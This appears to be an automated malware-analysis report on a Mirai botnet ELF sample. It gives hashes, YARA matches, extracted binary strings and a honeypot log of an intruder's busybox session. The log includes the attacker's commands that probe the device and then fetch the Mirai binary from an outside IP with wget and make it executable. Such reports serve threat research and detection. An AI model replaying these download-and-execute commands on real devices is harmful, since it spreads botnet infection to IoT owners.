Sample details: 157679ac46d453489aba544e266ae5af --

Hashes
MD5: 157679ac46d453489aba544e266ae5af
SHA1: 2d0b865ddcdd85ad0b4f032e2e900e811a38cbba
SHA256: 382349e6b3bcd8b1b299d94b7b216078617ce4b1653d9a4aff453439f8c6f909
SSDEEP: 1536:WusXlwjmqU6gRh2LnvyFpmWeUESckP98Q:WuilwCqU6gCTvyFpmWetScEeQ
Details
File Type: ELF
Yara Hits
YRP/maldoc_getEIP_method_1 | YRP/contentis_base64 | YRP/url | YRP/domain | YRP/IP | YRP/Big_Numbers1 | FlorianRoth/Mirai_Botnet_Malware |
Strings
		PTRh6K
D$LhmK
L$d9L$p
D$p9D$,
D$(j@j
D$$j@j
D$(_]j
;|$(t:WWj
D$ j@j
\$H9\$
D$ j@j
< t <	t
C)QQWP
D$ JR**
f;D$Pu
;T$(}Q
D$$PSV
xAPPSh`c
\$Th<`
\$0PPj
}/C;T$
t$$hl`
u%WWSS
[2016-12-11 03:47:56 UTC] [163.172.121.4:37345] CMD: sh
[2016-12-11 03:47:57 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:04 UTC] [163.172.121.4:37345] CMD: /bin/busybox ps; /bin/busybox ECCHI
[2016-12-11 03:48:05 UTC] [163.172.121.4:37345] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
[2016-12-11 03:48:08 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
[2016-12-11 03:48:12 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/home/admin' > /home/admin/.nippon; /bin/busybox cat /home/admin/.nippon; /bin/busybox rm /home/admin/.nippon
[2016-12-11 03:48:13 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
[2016-12-11 03:48:14 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:15 UTC] [163.172.121.4:37345] CMD: rm /home/admin/.t; rm /home/admin/.sh; rm /home/admin/.human
[2016-12-11 03:48:15 UTC] [163.172.121.4:37345] CMD: cd /home/admin/
[2016-12-11 03:48:17 UTC] [163.172.121.4:37345] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2016-12-11 03:48:19 UTC] [163.172.121.4:37345] CMD: /bin/busybox cat /bin/echo
[2016-12-11 03:48:20 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:21 UTC] [163.172.121.4:37345] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2016-12-11 03:48:22 UTC] [163.172.121.4:37345] CMD: /bin/busybox wget http://80.82.64.2:80/bins/mirai.x86 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
t@;D$xu
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
/proc/net/tcp
/dev/watchdog
/dev/misc/watchdog
abcdefghijklmnopqrstuvw012345678
ZOJFKRA
FGDCWNV
HWCLVGAJ
QWRRMPV
RCQQUMPF
QOACFOKL
OGKLQO
cFOKLKQVPCVMP
QGPTKAG
QWRGPTKQMP
CFOKLKQVPCVMP
Q[QVGO
FPGCO@MZ
PGCNVGI
CFOKL"
CFOKLbO[OKDK"
xOStDMqkr"
CLVQNS"
FGDCWNV"
CFOKLNTHJ"
CFOKLNTHJCFOKLNTHJ
assword
NKQVGLKLE
uEzAs"
FGNGVGF
CLKOG"
QVCVWQ"
pgrmpv
jvvrdnmmf"
nmnlmevdm"
XMNNCPF"
egvnmacnkr"
QJGNN"
GLC@NG"
Q[QVGO"
@WQ[@MZ
okpck"
CRRNGV
DMWLF"
LAMPPGAV"
@WQ[@MZ
@WQ[@MZ
vqMWPAG
gLEKLG
sWGP["
PGQMNT
LCOGQGPTGP
aMLLGAVKML
CNKTG"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
QGPTGP
ANMWFDNCPG
LEKLZ"
cAAGRV
CRRNKACVKML
ZJVON	ZON
CRRNKACVKML
cAAGRV
nCLEWCEG
aMLVGLV
CRRNKACVKML
WPNGLAMFGF"
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
cRRNGuG@iKV
tGPQKML
qCDCPK
/dev/null
[2016-12-11 03:49:45 UTC] [163.172.121.4:37345] SAMPLE: /etc/blue/039d3e6ea326a3a3b9b454d67107a00b